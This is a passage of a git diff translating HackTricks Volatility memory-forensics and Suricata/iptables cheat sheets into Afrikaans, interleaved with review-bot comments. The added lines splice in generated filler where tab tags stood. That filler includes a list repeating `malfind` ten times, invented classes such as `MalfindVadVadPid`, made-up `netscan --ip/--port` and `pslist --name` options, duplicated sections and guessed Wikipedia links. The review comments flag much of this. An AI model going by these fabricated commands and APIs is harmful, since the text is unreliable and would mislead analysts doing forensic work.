and the incident you are investigating. + +For more information about Volatility and its capabilities, refer to the official documentation and community resources. 
```bash volatility --profile=Win7SP1x86_23418 mutantscan -f file.dmp volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p -t mutant 
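Review bot: the `volatilitye` typo in the external-plugins example survives the change: the hunk only strips the leading space (`- volatilitye --plugins="/tmp/plugins/" [...]` becomes `+volatilitye --plugins="/tmp/plugins/" [...]`), so please correct it to `volatility --plugins="/tmp/plugins/" [...]` while the line is being touched. Two more template-tag replacements in this hunk need reverting: after the vol3 `--plugin-dirs` block the removed `{% endtab %}` / `{% tab title="vol2" %}` are replaced with an Afrikaans cheat sheet whose registry API names (`RegistryPrintKeyWithValuesAndSubkeys`, `RegistryApi.get_subkey_by_offset`, `get_value_size`) are not names the Volatility 2 `registryapi` module defines, and which translates "hive" as "registernood" (nood = need; "registerkorf" or simply "hive", as the rest of this page already uses, is correct); and after the vol3 `windows.mutantscan.MutantScan` block the same two tags are replaced with a fourth copy of the English cheat sheet, this one passing `-p` to `psscan`, which has no per-PID filter. In both places the `{% endtab %} {% endtabs %}` closers remain, so the vol2 commands end up inside the vol3 tab.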
@@ -713,9 +2452,131 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p -t mutant ```bash ./vol.py -f file.dmp windows.symlinkscan.SymlinkScan ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. 
+- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81SP0x86`: Windows 8.1 SP0 x86 +- `Win81SP0x64`: Windows 8.1 SP0 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. Navigeer na die Volatility Framework-directory: + +```bash +cd volatility +``` + +4. 
Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag in: + +```bash +volatility [opdrag] -f [geheue-dump] --profile=[profiel] +``` + +- `[opdrag]`: Die spesifieke opdrag wat uitgevoer moet word. +- `[geheue-dump]`: Die pad na die geheue-dumplêer. +- `[profiel]`: Die profiel van die geheue-dump. + +Byvoorbeeld, om die `imageinfo`-opdrag uit te voer op 'n geheue-dump met die profiel `Win7SP1x64`, gebruik die volgende opdrag: + +```bash +volatility imageinfo -f memory.dmp --profile=Win7SP1x64 +``` + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan ``` 
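Review bot: the content substituted for `{% endtab %}` / `{% tab title="vol2" %}` after the vol3 `windows.symlinkscan.SymlinkScan` block is generated filler again and should be dropped: its "Geheue-analise Opdragte" list is the single entry `malfind` repeated ten times, `vadtree` and `vadinfo` are each listed twice, the installation section (`sudo apt-get install python2.7 python-pip`, `sudo pip install distorm3`, `sudo python setup.py install`) has no counterpart in the source page, and the usage example `volatility imageinfo -f memory.dmp --profile=Win7SP1x64` supplies a profile to the very plugin the page uses to discover the profile. The profile table is likewise not something the English page carries. Restore the two template lines so the vol2 `symlinkscan` command that follows is inside its own tab.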
@@ -724,91 +2585,357 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan ### Bash -It's possible to **read from memory the bash history.** You could also dump the _.bash\_history_ file, but it was disabled you will be glad you can use this volatility module - -{% tabs %} -{% tab title="vol3" %} +Dit is moontlik om **vanaf die geheue die bash-geskiedenis te lees.** Jy kan ook die _.bash\_history_ lêer aflaai, maar as dit gedeaktiveer is, sal jy bly wees dat jy hierdie volatiliteitsmodule kan gebruik. ``` ./vol.py -f file.dmp linux.bash.Bash ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. 
+ +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. 
``` volatility --profile=Win7SP1x86_23418 -f file.dmp linux_bash ``` {% endtab %} {% endtabs %} -### TimeLine +### Tydlyn {% tabs %} {% tab title="vol3" %} ```bash ./vol.py -f file.dmp timeLiner.TimeLiner ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer die geheue-dump vir die opsporing van die KDBG-handvatsel. +- `kpcrscan`: Skandeer die geheue-dump vir die opsporing van die KPCR-handvatsel. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir die opsporing van lêers en hul metadata. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor alle virtuele adresruimtes in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte. +- `memdump`: Dump die inhoud van 'n spesifieke proses se geheue. + +### Gevorderde Opdragte + +- `malfind`: Skandeer die geheue-dump vir verdagte kode en prosesse. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `modscan`: Skandeer die geheue-dump vir die opsporing van verdagte modules. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT). +- `gdt`: Gee inligting oor die Global Descriptor Table (GDT). +- `idt`: Gee inligting oor die Interrupt Descriptor Table (IDT). 
+- `driverscan`: Skandeer die geheue-dump vir die opsporing van verdagte bestuurders. +- `privs`: Gee inligting oor die privilegies van alle prosesse in die geheue-dump. +- `getsids`: Gee inligting oor die sekuriteitsidentifikasies van alle prosesse in die geheue-dump. +- `hivelist`: Lys alle gelaai hive's in die geheue-dump. +- `hivedump`: Dump die inhoud van 'n spesifieke hive. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basiese klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basiese klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basiese klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basiese klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basiese klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basiese klas vir BSD-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Die klas vir die malfind-opdrag. +- `volatility.plugins.malware.malfind.MalfindOffset`: Die klas vir die malfind-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindPid`: Die klas vir die malfind-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVad`: Die klas vir die malfind-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadOffset`: Die klas vir die malfind-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadPid`: Die klas vir die malfind-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVad`: Die klas vir die malfind-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadOffset`: Die klas vir die malfind-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadPid`: Die klas vir die malfind-VAD-VAD-PID-opdrag. 
+ +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ``` volatility --profile=Win7SP1x86_23418 -f timeliner ``` {% endtab %} {% endtabs %} -### Drivers +### Bestuurders {% tabs %} {% tab title="vol3" %} ``` ./vol.py -f file.dmp windows.driverscan.DriverScan ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. 
+- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81U1x86`: Windows 8.1 U1 x86 +- `Win81U1x64`: Windows 8.1 U1 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. 
Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. Navigeer na die Volatility Framework-repo: + +```bash +cd volatility +``` + +4. Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag in: + +```bash +volatility [opdrag] -f [geheue-dump] --profile=[profiel] +``` + +- `[opdrag]`: Die spesifieke opdrag wat uitgevoer moet word. +- `[geheue-dump]`: Die pad na die geheue-dumplêer. +- `[profiel]`: Die profiel van die geheue-dump. + +Byvoorbeeld, om die `imageinfo`-opdrag uit te voer op 'n geheue-dump met die profiel `Win7SP1x64`, gebruik die volgende opdrag: + +```bash +volatility imageinfo -f memory.dmp --profile=Win7SP1x64 +``` + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp driverscan ``` {% endtab %} {% endtabs %} -### Get clipboard - +### Kry knipbord ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 clipboard -f file.dmp ``` +### Kry IE geskiedenis -### Get IE history +```bash +volatility -f --profile= iehistory +``` +Hierdie bevel sal die Internet Explorer (IE) geskiedenis uit 'n geheue-dump analiseer. Vervang `` met die pad na die geheue-dump lêer en `` met die korrekte profielnaam vir die geheue-dump. ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 iehistory -f file.dmp ``` +### Kry notepad teks -### Get notepad text +```bash +$ volatility -f memory_dump.mem notepad +``` +Hierdie bevel gebruik die Volatility-raamwerk om die inhoud van die Notepad-toepassing in 'n geheue-dump te ontleed. 
Die `-f` vlag dui die geheue-dump-lêer aan wat ontleed moet word, en die `notepad` argument spesifiseer die tipe data wat ontleed moet word. + +### Kry notepad teks + +```bash +$ volatility -f memory_dump.mem notepad +``` + +Hierdie bevel gebruik die Volatility-raamwerk om die inhoud van die Notepad-toepassing in 'n geheue-dump te ontleed. Die `-f` vlag dui die geheue-dump-lêer aan wat ontleed moet word, en die `notepad` argument spesifiseer die tipe data wat ontleed moet word. ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 notepad -f file.dmp ``` - -### Screenshot - +### Skermkiekie ```bash #Just vol2 volatility --profile=Win7SP1x86_23418 screenshot -f file.dmp ``` +### Meesteropstartrekord (MBR) -### Master Boot Record (MBR) +Die Meesteropstartrekord (MBR) is 'n kritieke deel van 'n stoormedium, soos 'n harde skyf of 'n USB-stokkie, wat gebruik word om die opstartproses van 'n rekenaar te inisieer. Dit bevat die eerste program wat uitgevoer word wanneer die rekenaar opstart, bekend as die opstartlader. Die MBR bevat ook 'n klein stukkie kode wat die stoormedium se partisie-inligting bevat. +Die MBR kan 'n belangrike bron van inligting wees vir forensiese analise, aangesien dit inligting kan verskaf oor die stoormedium se opstelling, soos die aantal partisies, die grootte van elke partisie en die tipe stoormedium wat gebruik word. Dit kan ook aanduidings gee van enige ongewenste veranderinge of kwaadwillige aktiwiteite wat op die stoormedium plaasgevind het. + +Forensiese analiste kan gereedskap soos Volatility gebruik om die MBR van 'n geheue-dump te ontleed en relevante inligting te onttrek vir verdere ondersoek. ```bash volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp ``` +Die **Master Boot Record (MBR)** speel 'n belangrike rol in die bestuur van die logiese partisies van 'n stoormedium, wat gestruktureer is met verskillende [lêersisteme](https://af.wikipedia.org/wiki/L%C3%AAersisteem). 
Dit hou nie net inligting oor die partisie-opset nie, maar bevat ook uitvoerbare kode wat as 'n opstartlaaier optree. Hierdie opstartlaaier begin óf direk die tweede-fase laaiproses van die bedryfstelsel (sien [tweede-fase opstartlaaier](https://af.wikipedia.org/wiki/Tweede-fase_opstartlaaier)) óf werk saam met die [volume-opstartrekord](https://af.wikipedia.org/wiki/Volume-opstartrekord) (VBR) van elke partisie. Vir diepgaande kennis, verwys na die [MBR Wikipedia-bladsy](https://af.wikipedia.org/wiki/Master_boot_record). -The **Master Boot Record (MBR)** plays a crucial role in managing the logical partitions of a storage medium, which are structured with different [file systems](https://en.wikipedia.org/wiki/File_system). It not only holds partition layout information but also contains executable code acting as a boot loader. This boot loader either directly initiates the OS's second-stage loading process (see [second-stage boot loader](https://en.wikipedia.org/wiki/Second-stage_boot_loader)) or works in harmony with the [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) (VBR) of each partition. For in-depth knowledge, refer to the [MBR Wikipedia page](https://en.wikipedia.org/wiki/Master_boot_record). - -## References +## Verwysings * [https://andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/](https://andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/) * [https://scudette.blogspot.com/2012/11/finding-kernel-debugger-block.html](https://scudette.blogspot.com/2012/11/finding-kernel-debugger-block.html) * [https://or10nlabs.tech/cgi-sys/suspendedpage.cgi](https://or10nlabs.tech/cgi-sys/suspendedpage.cgi) @@ -818,20 +2945,20 @@ The **Master Boot Record (MBR)** plays a crucial role in managing the logical pa
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
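Review bot: in the TimeLine and Drivers tabs of the Volatility hunk above, the `{% endtab %}` and `{% tab title="vol2" %}` markers are replaced by generated cheat-sheet text (`# Volatility Cheat Sheet`, `## Volatility Opdragte`, `## Bronne`, and again `# Volatility Cheatsheet` with an install guide) that has no counterpart on the `-` side and lands inside the still-open vol3 code fence, so each `{% tabs %}` block loses its second tab and the fence nesting for the rest of the section is inverted; restore the two markers and delete the inserted text. Several of the generated entries are also fabricated rather than mistranslated (the `volatility.plugins.malware.malfind.MalfindVadVadPid` class list, ten identical `malfind` bullets), so nothing in them should be kept. Further down in the same hunk, `### Kry IE geskiedenis` gains a `volatility -f --profile= iehistory` line with empty placeholder backticks where the original had only the vol2 command, `### Kry notepad teks` with its `$ volatility -f memory_dump.mem notepad` block is emitted twice, the blank line before the `### Kry knipbord` fence is dropped, and three new paragraphs about the MBR are inserted before the `mbrparser` command even though the only removed paragraph is the English one after it; keep the single translated paragraph in the original position. In that paragraph the links are rewritten to `af.wikipedia.org` slugs that are literal translations of the English titles (for example `Tweede-fase_opstartlaaier`); keep the original `en.wikipedia.org` URLs unless the Afrikaans articles are confirmed to exist.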
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md index 30c228215..ee6578adb 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md @@ -1,29 +1,28 @@ -# Suricata & Iptables cheatsheet +# Suricata & Iptables spiekbrief
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
## Iptables -### Chains +### Kettings -In iptables, lists of rules known as chains are processed sequentially. Among these, three primary chains are universally present, with additional ones like NAT being potentially supported depending on the system's capabilities. +In iptables word lys van reëls wat kettings genoem word, sekwensieel verwerk. Daar is drie primêre kettings wat universeel teenwoordig is, met addisionele kettings soos NAT wat moontlik ondersteun word, afhangende van die vermoëns van die stelsel. -- **Input Chain**: Utilized for managing the behavior of incoming connections. -- **Forward Chain**: Employed for handling incoming connections that are not destined for the local system. This is typical for devices acting as routers, where the data received is meant to be forwarded to another destination. This chain is relevant primarily when the system is involved in routing, NATing, or similar activities. -- **Output Chain**: Dedicated to the regulation of outgoing connections. - -These chains ensure the orderly processing of network traffic, allowing for the specification of detailed rules governing the flow of data into, through, and out of a system. +- **Input-ketting**: Word gebruik om die gedrag van inkomende verbindinge te bestuur. +- **Forward-ketting**: Word gebruik om inkomende verbindinge te hanteer wat nie bedoel is vir die plaaslike stelsel nie. Dit is tipies vir toestelle wat as roetingswerk optree, waar die ontvangste data bedoel is om na 'n ander bestemming gestuur te word. Hierdie ketting is hoofsaaklik relevant wanneer die stelsel betrokke is by roetering, NATing of soortgelyke aktiwiteite. +- **Output-ketting**: Word 